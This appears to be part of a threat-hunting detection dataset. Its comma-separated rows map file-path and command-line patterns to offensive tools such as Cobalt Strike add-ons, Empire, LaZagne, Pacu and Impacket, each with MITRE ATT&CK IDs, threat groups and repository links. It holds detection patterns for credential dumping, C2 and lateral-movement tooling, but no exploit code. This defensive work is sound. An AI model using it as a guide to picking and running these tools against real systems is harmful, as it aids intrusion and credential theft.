TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*/L0ading-x/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/L0ading-x/cve-2022-23131,1,1,N/A,N/A,1,23,11,2022-02-22T01:45:34Z,2022-02-22T01:39:52Z -*/laconicwolf/burp-extensions*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*/Ladon.go*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon.py*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon/Ladon.*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon/obj/x86*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/LadonGo/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/lambda__backdoor_new_roles*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/lambda__backdoor_new_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/lambda__backdoor_new_users*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/LambdaLooter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/lanattacks/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/lansearch.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/laps.py *--ldapserver*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/laps.py *-u * -p *,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/laps_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/LAPSDumper.git*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/lastpass.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/Lateral/SMB.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/lateral_movement/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/lateral_movement/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/laZagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/LaZagne/Windows/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ldap.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/ldap_injection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/ldap_search_bof.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/ldap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldap-novell-getpass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/LdapRelayScan.git*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*/ldap-rootdse.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldap-search.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldapsearch-ad.git*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*/LDAPWordlistHarvester.git*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*/ldeep/*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*/ldeepDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/LetMeOutSharp/*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*/lexmark-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/lgandx/Responder*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/lib/GHunt/*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*/lib/ipLookupHelper.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*/lib/msf/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/libgobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/liboffsetfinder64*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z 